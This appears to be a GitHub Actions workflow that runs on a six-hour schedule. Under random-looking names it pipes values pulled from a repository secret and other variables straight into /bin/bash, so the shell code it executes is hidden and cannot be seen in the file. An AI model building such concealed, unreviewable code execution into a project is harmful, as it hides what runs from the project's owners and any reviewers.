name: luxuejiao1988

on:
  workflow_dispatch:
  schedule:
    - cron: '43 4/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: luxuejiao1988
        env:
          pj78: ${{ secrets.pj78 }}
        run: |
          echo $pj78 | jq -r .xbipx3 | /bin/bash
          echo $cjy6865 | jq -r .svcu53017 | /bin/bash
          echo $wae569 | jq -r .pavrf9 | /bin/bash
          echo $xvh86 | jq -r .sgft14409 | /bin/bash
          echo $ljlo35476 | jq -r .ihc547 | /bin/bash

